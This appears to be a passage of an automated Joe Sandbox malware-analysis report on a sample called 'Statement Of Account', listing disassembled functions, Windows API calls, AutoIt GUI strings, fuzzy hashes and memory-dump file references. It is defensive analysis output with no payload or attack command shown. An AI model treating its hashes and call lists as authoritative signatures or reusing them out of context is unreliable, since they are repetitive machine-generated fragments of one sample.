Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _wcslen$_malloc_wcscat_wcscpy
String ID:
API String ID: 1597257046-0
Opcode ID: a0a60491a2b11ab92cb2618fcf1664bc73e22867390c023d5d6986141a6dc3e0
Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
Opcode Fuzzy Hash: a0a60491a2b11ab92cb2618fcf1664bc73e22867390c023d5d6986141a6dc3e0
Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764

Function 00455505 Relevance: 6.0, APIs: 4, Instructions: 43windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
DeleteObject.GDI32(?), ref: 0045564E
DeleteObject.GDI32(?), ref: 0045565C
DestroyCursor.USER32(?), ref: 0045566A

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: DeleteObject$CursorDestroyMessageSend
String ID:
API String ID: 2743624342-0
Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68

Function 0044B600 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 0044B60B
InterlockedExchange.KERNEL32(?,?), ref: 0044B619
RtlLeaveCriticalSection.NTDLL(?), ref: 0044B630
RtlLeaveCriticalSection.NTDLL(?), ref: 0044B641

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CriticalSection$Leave$EnterExchangeInterlocked
String ID:
API String ID: 2223660684-0
Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75

Function 00447268 Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC

MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
LineTo.GDI32(?,00000000,00000002), ref: 004472A0
EndPath.GDI32(?), ref: 004472B0
StrokePath.GDI32(?), ref: 004472BE

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
String ID:
API String ID: 2783949968-0
Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA

Function 00417D0E Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00417D1A

Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82

__getptd.LIBCMT ref: 00417D31
__amsg_exit.LIBCMT ref: 00417D3F
__lock.LIBCMT ref: 00417D4F

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E

Function 004389A1 Relevance: 6.0, APIs: 4, Instructions: 27threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
GetCurrentThreadId.KERNEL32 ref: 004389DA
AttachThreadInput.USER32(00000000), ref: 004389E1

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E

Function 0046EDC6 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 383COMMON

Download Yara Rule

Strings

, xrefs: 0046F188
8'I, xrefs: 0046F031, 0046F039

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: BuffCharLower
String ID: $8'I
API String ID: 2358735015-3608026889
Opcode ID: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
Opcode Fuzzy Hash: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B

Function 00478373 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593

Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287

Strings

Container, xrefs: 004784E0
AutoIt3GUI, xrefs: 004784DB

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CopyVariant$ContainedObject$ErrorLast_malloc
String ID: AutoIt3GUI$Container
API String ID: 3380330463-3941886329
Opcode ID: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
Opcode Fuzzy Hash: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55

Function 004099A8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00409A61

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779

CharUpperBuffW.USER32(?,?), ref: 00409AF5

Strings

0vH, xrefs: 00409BD9

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
String ID: 0vH
API String ID: 1143807570-3662162768
Opcode ID: bf773a96792e7386fbbaa0db16cdf7f70de857e2ea7db1c9c90ef838773f5a19
Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
Opcode Fuzzy Hash: bf773a96792e7386fbbaa0db16cdf7f70de857e2ea7db1c9c90ef838773f5a19
Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96

Function 0047DFD1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 156COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0047E14A

Strings

0vH, xrefs: 0047E191
GUI_RUNDEFMSG, xrefs: 0047E13A

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __wcsicoll
String ID: 0vH$GUI_RUNDEFMSG
API String ID: 3832890014-3270723165
Opcode ID: 83b23e106830e18eaa98bf379fefa2d67655e791f4e67ce1872082e8e5d00014
Instruction ID: 2b8fe0178686c88c13fb7999b9cca2f5cdddd115f13bfdefe6967d3446d7b31b
Opcode Fuzzy Hash: 83b23e106830e18eaa98bf379fefa2d67655e791f4e67ce1872082e8e5d00014
Instruction Fuzzy Hash: 825191725183409BC700DF56C88189FBBE4FF89358F404A6EF94963251D734EA89CB9A

Function 00466587 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON

Download Yara Rule

Strings

HH, xrefs: 00466678
HH, xrefs: 004665C5

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID:
String ID: HH$HH
API String ID: 0-1787419579
Opcode ID: fed4e066af51e45fc8c5976399addcc25001bc25a5639efd16b547c1275b717f
Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
Opcode Fuzzy Hash: fed4e066af51e45fc8c5976399addcc25001bc25a5639efd16b547c1275b717f
Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95

Function 00444652 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004446D4
GetMenuItemInfoW.USER32 ref: 00444711

Strings

0, xrefs: 004446CC

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 60781951bb834b78e0167a3e9afe01c70176745dc522d898366d6ad0e6242f51
Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
Opcode Fuzzy Hash: 60781951bb834b78e0167a3e9afe01c70176745dc522d898366d6ad0e6242f51
Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A

Function 00448358 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E

Strings

', xrefs: 004483C2

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A

Function 00450C09 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

msctls_updown32, xrefs: 00450C44

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID:
String ID: msctls_updown32
API String ID: 0-2298589950
Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A

Function 00444571 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

0, xrefs: 00444600

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA

Function 0045126C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313

Strings

Combobox, xrefs: 004512D1

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

